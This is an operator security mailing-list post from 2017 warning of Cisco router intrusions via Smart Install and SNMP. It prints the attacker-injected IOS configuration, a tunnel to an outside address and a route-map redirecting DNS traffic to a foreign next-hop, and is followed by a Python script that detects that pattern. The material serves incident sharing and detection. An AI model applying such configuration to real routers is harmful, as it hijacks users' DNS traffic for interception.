[nsp-sec] [TLP:Yellow] Possible IOS(-XR) SNMP security issue

Dominik Bay db at rrbone.net
Mon Oct 30 08:53:38 EDT 2017


Please keep an eye out for these bits of configuration. We see them
crafted specifically for the router they are deployed on, i.e. with
different VLAN-IDs etc.
As you can see they are redirecting DNS traffic, but only for about
30-45 minutes. After this time-frame the configuration is removed again.

conf t
int tun 1972343266
ip addr 23.29.x.y 255.255.255.0
ip nat inside
tun source xyz
tun dest 37.48.92.163
exit

access-list 2543 permit udp any any eq 53
access-list 2543 permit udp any eq 53 any

route-map hop2543
match ip addr 2543
set ip next-hop 23.29.167.71
exit

int Loopback 0
ip policy route-map hop2543
exit

int Vlan 1
ip policy route-map hop2543
exit

end

Cheers,
Dominik


On 10/30/2017 10:22 AM, Dominik Bay wrote:
> ----------- nsp-security Confidential --------
> 
> Hi all,
> 
> since these intrusions we discovered are based on publicly known issues
> 
> - Cisco Smart Install Vulnerability
> - SNMP RW access and bypassing SNMP ACLs via IP-Spoofing
> 
> I do not consider this TLP RED anymore, as mentioned in a mail before
> somewhere in the thread.
> 
> Please share accordingly with your customers and partners to check for
> this vulnerability and intrusion attempts.
> 
> Michael from PSIRT suggested these resources to learn more about the SMI
> vulnerability:
> 
> ----8<----
> https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
> 
> If you need a good way to scan a network for devices that have SMI
> enabled, you can use the following tool:
> https://github.com/Cisco-Talos/smi_check
> 
> That tool is also mentioned in this blog post by our Talos organization,
> which in turn is referenced in the document Dario referred to:
> http://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
> 
> ---->8----
> 
> Cheers,
> Dominik
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
> 


-- 
rrbone UG (haftungsbeschraenkt) - Ruhrallee 9 - 44139 Dortmund
HR B 23168 Amtsgericht Dortmund - Geschaeftsfuehrer: Dominik Bay
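Added detection example, not part of Dominik's mail or of any Cisco tooling: a small Python script that scans a saved `show running-config` for the pattern reported above, an extended access-list permitting UDP/53, a route-map matching that ACL with a `set ip next-hop`, and the interfaces where that route-map is applied with `ip policy route-map`. The embedded config excerpt is constructed for the example and uses documentation placeholder addresses.

```python
import re

# Constructed show-run excerpt shaped like the injected config from the report; placeholder addresses.
SAMPLE_CONFIG = """\
interface Tunnel1972343266
 ip address 192.0.2.10 255.255.255.0
 tunnel destination 198.51.100.7
!
access-list 2543 permit udp any any eq 53
access-list 2543 permit udp any eq 53 any
!
route-map hop2543 permit 10
 match ip address 2543
 set ip next-hop 192.0.2.71
!
interface Loopback0
 ip policy route-map hop2543
!
interface Vlan1
 ip policy route-map hop2543
"""

def parse_blocks(config):
    """Group an IOS config into (header, [child lines]) by its one-space indentation."""
    blocks = []
    for line in config.splitlines():
        if not line.strip() or line.startswith("!"):
            continue
        if line.startswith(" ") and blocks:
            blocks[-1][1].append(line.strip())
        else:
            blocks.append((line.strip(), []))
    return blocks

def find_dns_redirects(config):
    """Return route-maps that policy-route DNS (UDP/53) to a next-hop and where they are applied."""
    blocks = parse_blocks(config)
    acl_re = re.compile(r"access-list (\S+) permit udp .*\beq (?:53|domain)\b")
    dns_acls = {m.group(1) for m in map(acl_re.match, (h for h, _ in blocks)) if m}
    findings = []
    for header, children in blocks:
        if not header.startswith("route-map "):
            continue
        name = header.split()[1]
        acls = {a for c in children if c.startswith("match ip address ") for a in c.split()[3:]}
        hops = [c.split()[-1] for c in children if c.startswith("set ip next-hop ")]
        if acls & dns_acls and hops:
            applied = sorted(h.split(None, 1)[1] for h, ch in blocks
                             if h.startswith("interface ") and f"ip policy route-map {name}" in ch)
            findings.append({"route_map": name, "next_hops": hops, "interfaces": applied})
    return findings
```

Run it over configs pulled by your config-management system and alert on any non-empty result, plus on tunnel interfaces you did not provision.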